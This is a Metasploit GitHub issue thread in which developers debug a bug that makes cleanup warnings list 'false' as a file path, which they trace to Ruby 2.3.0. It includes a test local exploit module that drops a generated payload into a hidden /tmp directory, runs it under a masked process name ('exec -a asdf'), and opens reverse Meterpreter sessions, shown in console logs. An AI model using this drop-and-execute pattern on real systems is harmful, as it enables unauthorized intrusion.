Metasploit-framework: `This exploit may require manual cleanup of 'false' on the target`

Created on 5 Feb 2018 · 7 Comments · Source: rapid7/metasploit-framework

This exploit may require manual cleanup of 'false' on the target - but false is not a file nor directory, nor was it mentioned anywhere in the module, nor on the filesystem.

Tested with the latest Metasploit from the GitHub msf5 branch, which has mettle updated to 0.3.7 (master branch uses 0.3.6).

This happens from time to time. Intermittent issue.

Tested on Fedora 19, 20 and 27. Can't reproduce on Fedora 13.

Steps to reproduce

The following local exploit module demonstrates this issue:

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Test reg_dir_for_cleanup',
      'Description'    => %q{
        Test
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'test reg_dir_for_cleanup'
        ],
      'DisclosureDate' => 'test dir cleanup',
      'Platform'       => [ 'linux' ],
      'Arch'           => [ ARCH_X86 ],
      'SessionTypes'   => [ 'shell', 'meterpreter' ],
      'Targets'        => [[ 'Auto', {} ]],
      'References'     =>
        [
          [ ]
        ]
    ))
  end

  def exploit
    # create a dir
    d = '/tmp/.delete.me.dir'
    cmd = "mkdir -p #{d}"
    print_status "Running command: #{cmd.inspect}"
    output = cmd_exec cmd
    output.each_line { |line| vprint_status line.chomp }
    register_dir_for_cleanup d

    # upload payload
    payload_file = "#{d}/.payload.file"
    rm_f payload_file
    write_file payload_file, generate_payload_exe
    register_file_for_cleanup payload_file
    cmd_exec "chmod +x #{payload_file}"

    # execute
    cmd = payload_file
    print_status "Running command: #{cmd.inspect}"
    output = cmd_exec "bash -c \"exec -a asdf #{cmd}&\""
    output.each_line { |line| vprint_status line.chomp }

    puts cmd_exec 'echo we made it to the end'
  end
end

Example Output

msf5 exploit(linux/local/test_reg_dir_for_cleanup) > sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  11        shell cmd/unix               172.16.191.244:1337 -> 172.16.191.137:39405 (172.16.191.137)

msf5 exploit(linux/local/test_reg_dir_for_cleanup) > rexploit 
[*] Reloading module...

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.244:4444 
[*] Running command: "mkdir -p /tmp/.delete.me.dir"
[*] Running command: "/tmp/.delete.me.dir/.payload.file"
[*] Sending stage (857352 bytes) to 172.16.191.137
[*] Meterpreter session 13 opened (172.16.191.244:4444 -> 172.16.191.137:43509) at 2018-02-05 08:26:10 -0500
we made it to the end
[+] Deleted /tmp/.delete.me.dir/.payload.file
[+] Deleted /tmp/.delete.me.dir
[!] This exploit may require manual cleanup of '/tmp/.delete.me.dir/.payload.file' on the target
[!] This exploit may require manual cleanup of 'false' on the target
[!] This exploit may require manual cleanup of 'false' on the target

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.191.137 - Meterpreter session 13 closed.  Reason: User exit
msf5 exploit(linux/local/test_reg_dir_for_cleanup) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.244:4444 
[*] Running command: "mkdir -p /tmp/.delete.me.dir"
[*] Running command: "/tmp/.delete.me.dir/.payload.file"
[*] Sending stage (857352 bytes) to 172.16.191.137
[*] Meterpreter session 14 opened (172.16.191.244:4444 -> 172.16.191.137:43516) at 2018-02-05 08:26:21 -0500
[+] Deleted /tmp/.delete.me.dir/.payload.file
[+] Deleted /tmp/.delete.me.dir
we made it to the end

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.191.137 - Meterpreter session 14 closed.  Reason: User exit
msf5 exploit(linux/local/test_reg_dir_for_cleanup) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.244:4444 
[*] Running command: "mkdir -p /tmp/.delete.me.dir"
[*] Running command: "/tmp/.delete.me.dir/.payload.file"
[*] Sending stage (857352 bytes) to 172.16.191.137
[*] Meterpreter session 15 opened (172.16.191.244:4444 -> 172.16.191.137:43519) at 2018-02-05 08:26:27 -0500
we made it to the end
[+] Deleted /tmp/.delete.me.dir/.payload.file
[+] Deleted /tmp/.delete.me.dir
[!] This exploit may require manual cleanup of '/tmp/.delete.me.dir/.payload.file' on the target
[!] This exploit may require manual cleanup of 'false' on the target
[!] This exploit may require manual cleanup of 'false' on the target

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.191.137 - Meterpreter session 15 closed.  Reason: User exit
msf5 exploit(linux/local/test_reg_dir_for_cleanup) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.244:4444 
[*] Running command: "mkdir -p /tmp/.delete.me.dir"
[*] Running command: "/tmp/.delete.me.dir/.payload.file"
[*] Sending stage (857352 bytes) to 172.16.191.137
[*] Meterpreter session 16 opened (172.16.191.244:4444 -> 172.16.191.137:43525) at 2018-02-05 08:26:37 -0500
we made it to the end
[+] Deleted /tmp/.delete.me.dir/.payload.file
[+] Deleted /tmp/.delete.me.dir
[!] This exploit may require manual cleanup of '/tmp/.delete.me.dir/.payload.file' on the target
[!] This exploit may require manual cleanup of 'false' on the target
[!] This exploit may require manual cleanup of 'false' on the target

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.191.137 - Meterpreter session 16 closed.  Reason: User exit

All 7 comments

I can't repro this yet. This one's a little strange because I don't see how false is getting into @dropped_files or @dropped_dirs.

I can reproduce this issue reliably on Fedora 20. The issue doesn't occur on Ubuntu 14.

Chatting with @wvu-r7 we narrowed down the cause a bit.

The issue appears to relate to cleanup. In particular, adding the following cleanup method with super consistently reproduces the issue (9 / 10 fails) as per the above output:

  def cleanup
    puts 'cleanup got called'
    super
  end

Whereas the following cleanup without super resolves the issue (0 / 10 failures):

  def cleanup
    puts 'cleanup got called'
  end

Indicating something funky is happening with the super methods in one of the mixins.

In file_dropper.rb, can you please add some debug output like:

# We don't know for sure if paths have been deleted, so always warn about it to the user
$stderr.puts "#{@dropped_files} #{@dropped_dirs}"
(@dropped_files + @dropped_dirs).each do |p|
  print_warning("This exploit may require manual cleanup of '#{p}' on the target")
end

so we can see what the actual contents of @dropped_files and @dropped_dirs are here?

Also, could you test with a newer Ruby (2.4.3 would be great) to verify we're not tracking a bug from 2.3.0? Not sure if it makes a difference but it would be good to rule it out.

Part of what is breaking this appears to be not having any references in the module:

[02/07/2018 17:09:07] [w(0)] core: Exception in on_session_open event handler: NoMethodError: undefined method `refs' for #<Msf::Modules::Mod6578706c6f69742f6c696e75782f6c6f63616c2f626c617267686868::MetasploitModule:0x00007fb47d09fea0>
[02/07/2018 17:09:07] [w(0)] core: Call Stack
/Users/acammack/rapid7/metasploit-framework/lib/msf/core/db_manager/session.rb:132:in `block in infer_vuln_from_session'

Interesting, so a silent failure in on_session_open is causing other on_session_opens to fail to run?

Seems this might be related to using Ruby 2.3.0.

I can't reproduce this error with Ruby 2.4.0 or Ruby 2.4.3.

Here's the requested output with the lib/msf/core/exploit/file_dropper.rb patch:

msf5 exploit(linux/local/test_reg_dir_for_cleanup) > set session 1
session => 1
rmsf5 exploit(linux/local/test_reg_dir_for_cleanup) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.244:4444 
[*] Running command: "mkdir -p /tmp/.delete.me.dir"
[*] Running command: "/tmp/.delete.me.dir/.payload.file"
[*] Sending stage (857352 bytes) to 172.16.191.137
[*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.137:47894) at 2018-02-08 04:54:45 -0500
[+] Deleted /tmp/.delete.me.dir/.payload.file
[+] Deleted /tmp/.delete.me.dir
we made it to the end
cleanup got called

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.191.137 - Meterpreter session 2 closed.  Reason: User exit
msf5 exploit(linux/local/test_reg_dir_for_cleanup) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.244:4444 
[*] Running command: "mkdir -p /tmp/.delete.me.dir"
[*] Running command: "/tmp/.delete.me.dir/.payload.file"
[*] Sending stage (857352 bytes) to 172.16.191.137
[*] Meterpreter session 3 opened (172.16.191.244:4444 -> 172.16.191.137:47900) at 2018-02-08 04:54:49 -0500
we made it to the end
cleanup got called
[+] Deleted /tmp/.delete.me.dir/.payload.file
[+] Deleted /tmp/.delete.me.dir
["/tmp/.delete.me.dir/.payload.file", false, false] []
[!] This exploit may require manual cleanup of '/tmp/.delete.me.dir/.payload.file' on the target
[!] This exploit may require manual cleanup of 'false' on the target
[!] This exploit may require manual cleanup of 'false' on the target

meterpreter > 
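
The debug line above shows two `false` values sitting in the tracked file list, which the warning loop then interpolates as if they were paths. As an added example (not part of the thread and not Metasploit's code), the stand-alone Ruby below models that warning loop with a validation step, so corrupt entries are reported as a tracking failure instead of as a path; `audit_dropped` and `cleanup_report` are hypothetical names, and the sample array is constructed from the debug output above.

```ruby
# Added example, not Metasploit code: a stand-alone model of the cleanup
# warning loop that validates tracked entries before reporting them.
# audit_dropped and cleanup_report are hypothetical helper names.

# Split the tracked lists into usable paths and corrupt (non-path) entries.
# Works on copies so a concurrent change to the live lists cannot alter
# what is being iterated.
def audit_dropped(dropped_files, dropped_dirs)
  snapshot = dropped_files.dup + dropped_dirs.dup
  paths, corrupt = snapshot.partition { |e| e.is_a?(String) && !e.empty? }
  { paths: paths.uniq, corrupt: corrupt }
end

# Build the operator-facing warnings: one line per real path, plus a single
# line that states how many entries were not paths and what they were.
def cleanup_report(dropped_files, dropped_dirs)
  audit = audit_dropped(dropped_files, dropped_dirs)
  lines = audit[:paths].map do |p|
    "This exploit may require manual cleanup of '#{p}' on the target"
  end
  unless audit[:corrupt].empty?
    counts = audit[:corrupt].each_with_object(Hash.new(0)) { |e, h| h[e.inspect] += 1 }
    detail = counts.map { |value, n| "#{value} x#{n}" }.join(', ')
    lines << "Cleanup list held #{audit[:corrupt].size} non-path entries (#{detail}); " \
             'tracking is unreliable, verify the target by hand'
  end
  lines
end

# Constructed input: the array contents printed by the debug line in the thread.
SAMPLE_FILES = ['/tmp/.delete.me.dir/.payload.file', false, false].freeze
SAMPLE_DIRS = [].freeze

puts cleanup_report(SAMPLE_FILES, SAMPLE_DIRS) if __FILE__ == $PROGRAM_NAME
```

This only changes how the list is reported; it does not explain how `false` got into the list, which the thread attributes to Ruby 2.3.0 without identifying a root cause.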

This was still an issue last I checked (probably a few weeks ago).

The presence of this bug is a little disconcerting; however, Ruby 2.3.0 is EOL in less than a month.

Closing.
